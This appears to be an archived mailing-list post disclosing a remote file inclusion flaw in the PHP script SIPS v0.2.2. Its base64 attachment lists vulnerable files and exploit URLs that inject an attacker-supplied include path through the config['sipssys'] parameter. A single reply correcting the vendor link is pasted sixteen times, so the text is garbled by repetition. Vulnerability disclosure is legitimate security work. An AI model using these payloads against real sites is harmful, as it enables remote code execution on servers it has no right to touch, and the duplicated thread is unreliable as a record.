SIPS v0.2.2 Remote File Inclusion Vulnerability

--00504502e501ebdea6046d925958
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hi Dear,
Please publish this bug.
Thank you

--00504502e501ebdea6046d925958
Content-Type: text/plain; charset=US-ASCII; name="SIPS v0.2.2.txt"
Content-Disposition: attachment; filename="SIPS v0.2.2.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: file0

Lz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09XA0KICB8CQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJICB8DQogIHwgIFtvXSBTSVBTIHYwLjIuMiBSZW1vdGUgRmlsZSBJbmNsdXNpb24gVnVsbmVy
YWJpbGl0eQkJCQkJCQkJICAgICAJICB8DQogIHwJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkgIHwN
CiAgfCAgICAgICBTb2Z0d2FyZSA6IFNJUFMgdjAuMi4yCQkJCQkJCQkJCQkJCQkgICAgIAkgIHwN
CiAgfCAgICAgICBWZW5kb3IgICA6IGh0dHA6Ly93d3cucGhwc2NyaXB0cy1mci5uZXQvc2NyaXB0
cy9ob3N0ZWQvc2lwczAyMi56aXAJCQkgICAgICAgICAgfA0KICB8ICAgICAgIEF1dGhvciAgIDog
Q3J1M2wuYjB5CQkJCQkJCQkJCQkJCSAgICAgICAgCQkgIHwJCQkJCQkJICAgICAJCQkJICB8DQog
IHwJCSAgSG9tZSAgICAgOiBXd1cuRGVsdGFIYWNraW5nLk5ldCAJCQkJCQ0KICB8PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT18DQogIHwJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkgIHwNCiAg
fCAgW29dIFZ1bG5lcmFibGUgZmlsZQkJCQkJCQkJCQkJCQkJCQkJCSAgfA0KICB8CQkJCQkJCQkJ
CQkJCQkJCQkJICAJCQkJCQkgIHwNCiAgfCAgICAgICBzZWFyY2gucGhwCQkJCQkJCQkgICAgICAg
ICAgICAgICAgICAJCQkJCSAgICAgICAgICB8DQogIHwJCQkJCQkJCQkJCQkJCQkJCQkgIAkJCQkJ
CSAgfA0KICB8ICAgICAgICBpbmNsdWRlICRjb25maWdbInNpcHNzeXMiXSAuIi9jb2RlL25ld3Mu
aW5jLnBocCI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgCQkgICAgICB8CQ0KICB8ICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB8DQogIHwgICAgICAgcmVhZG1vcmUucGhw
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIHwNCiAgfCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgfA0KICB8CQkgICBpbmNsdWRlICRjb25maWdbInNpcHNzeXMiXSAuIi9jb2RlL25ld3Mu
aW5jLnBocCI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB8DQogIHwJCSAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHwNCiAgfAkJICBpbmRleC5waHAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgfA0KICB8CQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB8
DQogIHwJCSAgIGluY2x1ZGUgJGNvbmZpZ1sic2lwc3N5cyJdIC4iL2NvZGUvbmV3cy5pbmMucGhw
IjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHwNCiAgfCAgICAgICAgaW5j
bHVkZSAkY29uZmlnWyJzaXBzc3lzIl0gLiIvY29kZS9ib3guaW5jLnBocCI7ICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgfA0KICB8CQkgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICB8DQogIHwJICAgICAgc2VhcmNoL3N1Ym1pdC5waHAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHwN
CiAgfAkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfA0KICB8CQkgICBpbmNsdWRl
ICRjb25maWdbInNpcHNzeXMiXSAuIi9jb2RlL3NlYXJjaC5pbmMucGhwIjsgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICB8DQogIHwJCQkJCQkJCQkJCQkJCQkJCQkgIAkJCQkJCSAg
fA0KICB8CQkJCQkJCQkJCQkJCQkJCQkJICAJCQkJCQkgIHwNCiAgfAkJCQkJCQkJCQkJCQkJCQkJ
CSAgICAJCQkJCSAgfA0KICB8ICBbb10gRXhwbG9pdAkJCQkJCQkJCQkJCQkJICAJCQkJCQkgIHwN
CiAgfAkJCQkJCQkJCQkJCQkJCQkJCSAgIAkJCQkJCSAgfA0KICB8ICAgICAgIGh0dHA6Ly9sb2Nh
bGhvc3QvW3BhdGhdL3NlYXJjaC5waHA/Y29uZmlnWyJzaXBzc3lzIl09W2V2aWxjb2RlXSAgICAg
ICAgICAgICAgICAgICAgICAgICB8DQogIHwgICAgICAgaHR0cDovL2xvY2FsaG9zdC9bcGF0aF0v
cmVhZG1vcmUucGhwP2NvbmZpZ1sic2lwc3N5cyJdPVtldmlsY29kZV0gICAgICAgICAgICAgICAg
ICAgICAgIHwNCiAgfCAgICAgICBodHRwOi8vbG9jYWxob3N0L1twYXRoXS9pbmRleC5waHA/Y29u
ZmlnWyJzaXBzc3lzIl09W2V2aWxjb2RlXSAgICAgICAgICAgICAgICAgICAgICAgICAgfA0KICB8
ICAgICAgIGh0dHA6Ly9sb2NhbGhvc3QvW3BhdGhdL3NlYXJjaC9zdWJtaXQucGhwP2NvbmZpZ1si
c2lwc3N5cyJdPVtldmlsY29kZV0gICAgICAgICAgICAgICAgICB8DQogIHwJCQkJCQkJCQkJCQkJ
CQkJCQkgIAkJCQkJCSAgfA0K
--00504502e501ebdea6046d925958--


Replies to this exploit:

From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/



From: Joe joe@avvanta.com
Sent: Tue 30. Jun 2009 12:38
On Tue, 30 Jun 2009, Cru3l.b0y wrote:

> Software : SIPS v0.2.2
> Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip

This is not the vendor. This is YAPSI (Yet Another Php Script Index)

SIPS was up to v0.3.1 as of 2005:

  http://sourceforge.net/projects/sips/